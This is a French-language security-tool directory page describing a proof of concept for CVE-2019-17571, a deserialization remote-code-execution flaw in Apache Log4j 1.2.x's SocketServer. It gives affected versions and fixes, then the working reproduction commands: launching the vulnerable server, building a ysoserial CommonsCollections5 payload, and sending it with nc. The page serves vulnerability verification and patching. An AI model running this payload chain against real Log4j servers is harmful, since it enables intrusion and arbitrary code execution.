Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-17571 — Apache Log4j 1.2.X présente une vulnérabilité d'exécution de code à distance par désérialisation | Kitploit
Outils/GitHubGitHub/shadow-horse/cve-2019-17571
Analyse des VulnérabilitésAnalyse de CodeExploitationTests d'IntrusionOutil d'Accès à Distance
GitHubshadow-horse/cve-2019-17571

CVE-2019-17571

Apache Log4j 1.2.X présente une vulnérabilité d'exécution de code à distance par désérialisation

Voir le dépôt
7852il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-17571/Vulnérabilité d'exécution de code à distance par désérialisation dans Apache Log4j 1.2.X

Lien de référence pour l'alerte de vulnérabilité : https://mp.weixin.qq.com/s/okU2y0izfnKXXtXG3EfLkQ

1. Description de la vulnérabilité

Apache Log4j est un outil de journalisation open source basé sur Java, développé par la Apache Software Foundation. Les versions de la série Apache Log4j 1.2.X contiennent une vulnérabilité d'exécution de code à distance par désérialisation. Un attaquant peut exploiter cette vulnérabilité pour exécuter des commandes malveillantes arbitraires. Dans Log4j 1.2.X, une classe SocketServer est incluse, qui est facilement vulnérable à la désérialisation de données non fiables. Lorsqu'elle écoute du trafic réseau non fiable contenant des données de journalisation, combinée à des gadgets de désérialisation, cette classe peut être utilisée pour exécuter du code arbitraire à distance. L'impact concerne jusqu'à la version actuelle la plus récente.

2. Gravité de la vulnérabilité

Élevée

Versions concernées 1.2.4 <= Apache Log4j <= 1.2.17 (dernière version)

Recommandations de correction

  1. Mettre à jour vers la dernière version de la série Apache Log4j 2
  2. Interdire l'exposition à Internet du port socket ouvert par cette classe

3. Vérification de la vulnérabilité

À l'époque d'Apache Log4j 2.8.1, il existait déjà une vulnérabilité d'exécution de code à distance par désérialisation (CVE-2017-5645), la classe de vulnérabilité déclenchée était org.apache.logging.log4j.core.net.server.TcpSocketServer. À l'ère d'Apache Log4j 1.2.X, la classe vulnérable est devenue org.apache.log4j.net.SocketServer

1. Lancer l'environnement vulnérable

En recherchant en ligne, on constate que la manière de démarrer le socketserver de log4j 1.X est via la commande java, et non via du code Java. (Si d'autres méthodes existent, n'hésitez pas à nous en informer.)

De même, il faut télécharger les JARs affectés ainsi que les JARs pouvant exécuter du code, les définir dans les variables d'environnement (exemple ci-dessous pour Windows), puis lancer le service en passant trois paramètres : un port, un fichier de configuration log4j, et un répertoire lcf :

root@kitploit:~
java -cp log4j-1.2.17.jar;c3p0-0.9.5.2.jar;mchange-commons-java-0.2.11.jar;commons-collections-3.1.jar org.apache.log4j.net.SocketServer 4560 log4jserver.properties ./    

java -cp log4j-1.2.17.jar:../commons-collections/commons-collections-3.1.jar org.apache.log4j.net.SocketServer 4560 config/log4jserver.properties ./

2. Utiliser le POC RCE de log4j2

root@kitploit:~
java -jar ysoserial-master.jar CommonsCollections5 "curl http://127.0.0.1/ssrf/ssrf.php?rand=log4j" > log4j.curl.bin  

3. Envoyer un socket malveillant avec nc

root@kitploit:~
nc 127.0.0.1 4560 < log4j.curl.bin

Obtention des JARs associés : https://github.com/shadow-horse/Vulenvironment/libs

Télécharger l’outil